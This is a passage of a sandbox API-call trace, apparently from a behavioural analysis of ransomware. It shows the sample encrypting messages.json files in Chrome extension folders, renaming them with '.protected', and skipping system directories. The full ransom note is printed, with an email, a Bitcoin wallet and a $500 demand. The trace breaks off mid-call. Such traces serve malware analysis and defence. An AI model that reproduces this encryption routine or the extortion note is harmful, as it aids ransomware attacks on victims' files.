(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.206] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.206] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.206] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.206] CloseHandle (hObject=0x164) returned 1 [0081.206] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0081.206] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv") returned 145 [0081.206] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0081.206] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0081.206] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*") returned 147 [0081.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.206] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.207] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.207] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.207] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.207] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.207] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\.") returned 147 [0081.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.207] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.207] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.207] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.207] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.207] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.207] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\..") returned 148 [0081.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.207] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.207] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.207] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.207] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.207] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.207] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.208] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.208] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.208] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.208] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x289, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.210] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x289, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.210] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.210] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.210] CloseHandle (hObject=0x168) returned 1 [0081.210] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.protected") returned 169 [0081.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.protected")) returned 1 [0081.211] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.211] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\RESTORE_FILES.txt") returned 163 [0081.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.212] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.212] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.213] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.213] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.213] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.213] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.213] CloseHandle (hObject=0x164) returned 1 [0081.213] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0081.213] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0081.213] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th") returned 145 [0081.213] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0081.213] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0081.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*") returned 147 [0081.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.214] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.214] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.214] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.214] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.214] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.214] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\.") returned 147 [0081.214] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.214] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.214] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.214] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.214] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.214] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.214] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.214] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\..") returned 148 [0081.214] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.214] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.214] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.214] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.214] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.216] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.216] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.216] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.216] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x44b, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffbb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.218] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x44b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x44b, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.218] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.218] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.218] CloseHandle (hObject=0x168) returned 1 [0081.218] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.protected") returned 169 [0081.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.protected")) returned 1 [0081.219] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.219] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.219] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\RESTORE_FILES.txt") returned 163 [0081.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.220] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.220] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.221] lstrlenA 